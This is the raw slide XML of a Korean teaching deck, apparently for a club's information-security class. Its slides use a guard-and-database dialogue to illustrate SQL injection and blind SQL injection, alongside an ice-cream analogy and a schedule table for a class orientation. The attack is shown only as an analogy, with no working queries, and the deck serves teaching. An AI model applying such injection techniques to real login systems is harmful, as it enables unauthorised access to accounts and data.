                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E2357D-179B-49AA-9CBF-0E80FDC3214A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8658781" y="5992530"/>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교감</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="직사각형 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73650CCD-C1E6-4F20-BDA2-E7D63DC12BD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10325970" y="6181699"/>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외부인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="직사각형 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{959B7565-66AD-4B8C-AE34-752D1F3CB4BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3746950" y="4287967"/>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교도관</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204003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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>로그인 부탁해</a:t>
              </a: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어 있어 여기 계정정보</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>or</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직사각형 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7608D0C7-B57F-4AE4-A45B-221859FBEA10}"/>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45" name="직사각형 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D81412D-1364-403B-A8F9-8FABB5155BAD}"/>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46" name="직사각형 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E80485CF-0097-4CC0-B084-BE4F2A667918}"/>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F2ED8B93-FBE8-4B0F-BEE0-4369E0CA68B6}"/>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023985"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="841571"/>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7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DATABASE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>야</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>계정정보</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>에</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>,  ID </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>가</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>이고 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>PWD </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>가 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1234 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>인 계정 있니</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0C5491D-2B6B-4981-A5A0-883A6A64C429}"/>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FBEE75B6-BA7C-4EAF-AC95-45A3B29A87F7}"/>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로그인 성공</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>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7D4AFCD0-3CB3-4C0F-9A86-1B01F571A066}"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37846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43" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>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가 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin, PWD</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1234 ??</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39"/>
            <a:ext cx="2289146" cy="1360033"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="1006926"/>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764165"/>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323453214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가 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin ?</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>어 있어 여기 계정정보</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRP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성공</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRP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383710"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="1070115"/>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827354"/>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280662551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아이스크림 사달라 | 웹진 인벤 - 인벤">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C6060B-645A-4340-85CF-CD353CC100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96" b="14288"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3979145" y="1877479"/>
            <a:ext cx="4521759" cy="4322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98773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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18E158DD-3B94-4755-8D03-235F582CF9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983" y="2210637"/>
            <a:ext cx="4704248" cy="387461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9133BDB3-1160-4DF8-BC80-F0FBB20A30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3770" y="2210637"/>
            <a:ext cx="4704248" cy="3874614"/>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8956FCC4-4C6B-46F8-BE0F-A95666FCC36B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6983605" y="3104941"/>
            <a:ext cx="1195753" cy="251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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>쌍쌍바</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="직사각형 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B504F2BE-EA95-4C75-BC9A-ABC82BDA65CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689798" y="3104941"/>
            <a:ext cx="1195753" cy="251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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>죠스바</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26387526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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{095DB44A-D047-4DD1-A0BB-C50CAF880B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6" b="11648"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3403836" y="1690688"/>
            <a:ext cx="5384328" cy="4868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97691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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>이고</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>데이터베이스 이름 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>번째 글자가 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘w’ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>면 로그인해줘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>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어 있어 여기 계정정보</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>or</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직사각형 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7608D0C7-B57F-4AE4-A45B-221859FBEA10}"/>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45" name="직사각형 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D81412D-1364-403B-A8F9-8FABB5155BAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7132848" y="1600804"/>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46" name="직사각형 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E80485CF-0097-4CC0-B084-BE4F2A667918}"/>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F2ED8B93-FBE8-4B0F-BEE0-4369E0CA68B6}"/>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39"/>
            <a:ext cx="2289146" cy="1225181"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="1006926"/>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764165"/>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7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>DATABASE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>야</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>,,</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>데이터베이스 이름 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>번째 글자가 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>‘w’ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>이면</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>계정정보</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>에</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>,  ID </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>가</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>admin </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>인 계정정보 줘</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0C5491D-2B6B-4981-A5A0-883A6A64C429}"/>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FBEE75B6-BA7C-4EAF-AC95-45A3B29A87F7}"/>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로그인 성공</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
            </a:p>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7D4AFCD0-3CB3-4C0F-9A86-1B01F571A066}"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261228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43"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728246637"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="687822" y="1763884"/>
          <a:ext cx="10665979" cy="4823548"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5332990">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1125923139"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5332989">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2379220699"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="396010">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>프로그래밍반 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>( - )</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>정보보호반 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>( 3~9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>명 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3144665978"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4232814">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
                        <a:t>3/19 (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
                        <a:t>금</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
                        <a:t>) 1900</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
                        <a:t>시</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
                        <a:t> OT </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0"/>
                        <a:t>진행</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0"/>
                        <a:t>!</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent5">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>* </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent5">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3/19 1830</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent5">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>시</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent5">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Zoom </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="accent5">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>방 번호 반장이 전파</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent5">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="285750" marR="0" lvl="0" indent="-2857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임시 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
                        <a:t>위키방</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>http://ko.nacker.wikidok.net/</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반장 팀 </a:t>
